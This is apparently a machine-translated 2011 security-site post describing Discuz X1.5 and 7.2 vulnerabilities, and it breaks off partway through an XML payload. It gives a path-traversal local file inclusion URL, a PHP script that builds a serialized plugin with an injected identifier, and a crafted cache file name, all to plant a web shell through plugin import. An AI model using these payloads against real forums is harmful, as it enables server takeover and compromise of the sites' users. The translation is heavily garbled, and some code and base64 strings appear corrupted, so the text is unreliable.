DISCUZ X1. 5 vulnerability-vulnerability warning-the black bar safety net

2011-03-21T00:00:00
ID MYHACK58:62201129816
Type myhack58
Reporter 佚名
Modified 2011-03-21T00:00:00

Description

DISCUZ X1. 5 local file inclusion vulnerability

Affected versions: DISCUZ X1. 5 other version unknown

Vulnerability type: local file inclusion vulnerability

Vulnerability analysis:

DISCUZX1. 5 local file inclusion, of course, is conditional, is to use a file as a cache. config_global.php $_config['cache']['type'] = 'file';

function cachedata($cachenames) { ...... $isfilecache = getglobal('config/cache/type') == 'file'; ...... if($isfilecache) { $lostcaches = array(); foreach($cachenames as $cachename) { if(!@ the include_once(DISCUZ_ROOT.'./ data/cache/cache_'.$ cachename.'. php')) { $lostcaches[] = $cachename; } }

...... }

The exploit: the

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc.php

Authracation has expiried The implementation of the api/uc.php the page code. =================================================

discuz x1. 5 discuz 7.2 background getshell 0day pass to kill Edition

From Discuz! Ancient 6. 0 version, the vulnerabilities are present in the extensions, use differently, the following start.

A Discuz! 6.0 and Discuz! 7.0 Since you want the background to take the Shell, the file is written to Must-see.

/include/cache.func.php

To turn on,find the calling function. All in updatecache function.

If we can control$plugin['identifier']have the opportunity,it is the plugins list read out. Go backstage look,you can find the identifier corresponding to the unique identifier. Lenovo under the secondary injection,single quotation marks read out from the database after the write the file will not be escaped. Cheap laugh about it. But...... You know,when you go to the wild zone single catch, opposite DPS,found the opposite squat the 4 enemies in the mood.

/admin/plugins.inc.php

Okay Discuz! Provides an import function,like you have the stealth,the opposite of no powder. You have a blast step,the opposite no control. Someway gave us leave to stay alive.

Just create a new plug-in,the identifier for the shell,generate the file path and content. And then export the backup. /forumdata/cache/plugin_shell.php

We can input any data,the only thing to note is the file name of legitimacy. Thanks to Microsoft,the following file name is legitimate.

/forumdata/cache/plugin_a']=phpinfo();$a['a.php

The last is encoded once,to to Exp:

<? php $a = unserialize(base64_decode ("YToyOntzOjY6InBsdWdpbiI7YTo5Ontzojk6imf2ywlsywjszsi7czoxoiiw IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0oijuyw1lijtzojg6ikdldhno ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzoju6ilnozwxsijtzojexoijkzxnj cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdgf0ywjszxmio3m6mdoiijtzojk6 ImRpcmVjdG9yeSI7czowOiIiO3M6OToiy29wexjpz2h0ijtzoja6iii7czo3 OiJtb2R1bGVzIjtzOjA6IiI7fXM6Nzoidmvyc2lvbii7czo1oii2ljaumci7 fQ==")); //print_r($a); $a['plugin']['name']='GetShell'; $a['plugin']['identifier']='a\']=phpinfo();$a[\"; print(base64_encode(serialize($a))); ?& gt;

!

7.0 similarly,we can go to test. If you use the code above,please tick the"Allow to import different versions of Discuz! The plug-in"

!

Two Discuz! 7.2 and Discuz! X1. 5

The following to 7. 2, for example

/admin/plugins.inc.php

Look at the import data process,Discuz! 7.2 after the import of data using XML,but 7. 2 maintains downward compatibility. X1. 5 abandoned.

The determination of the identifier after the version 7.0 before the vulnerability would not exist. But it also added a language pack...... As long as we control scriptlangstr or any other one you can.

The Key here is not universal.

7.2

X1. 5

Or look under the shell. lang. php file format.

7.2 version there is no filter Key,so the direct use of\destroy the single quotes. X1. 5,the single quotes are escaped into\',and then is replaced by a',or left\

And the$v in the two versions of the filter the same,relatively common.

X1. 5 at least Deputy Chief of the can management background,although do not see the plugin option,but can directly access the/admin. php? frames=yes&action=plugins add a plugin

$v universal Exp:

<? xmlversion="1.0"encoding="ISO-8 8 5 9-1"?& gt;

<root>

<itemid="Title"><! [CDATA[Discuz! Plugin]]></item>

<itemid="Version"><! [CDATA[7.2]]></item>

<itemid="Time"><! [CDATA[2011-03-16 1 5:5 7]]></item>

<itemid="From"><! [CDATA[Discuz! Board (</item">http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item>

<itemid="Data">

<itemid="plugin">

<itemid="available"><! [CDATA[0]]></item>

<itemid="adminid"><! [CDATA[0]]></item>

<itemid="name"><! [CDATA[www]]></item>

<itemid="identifier"><! [CDATA[shell]]></item>

<itemid="description"><! [CDATA[]]></item>

<itemid="datatables"><! [CDATA[]]></item>

<itemid="directory"><! [CDATA[]]></item>

<itemid="copyright"><! [CDATA[]]></item>

[1] [2] [3] next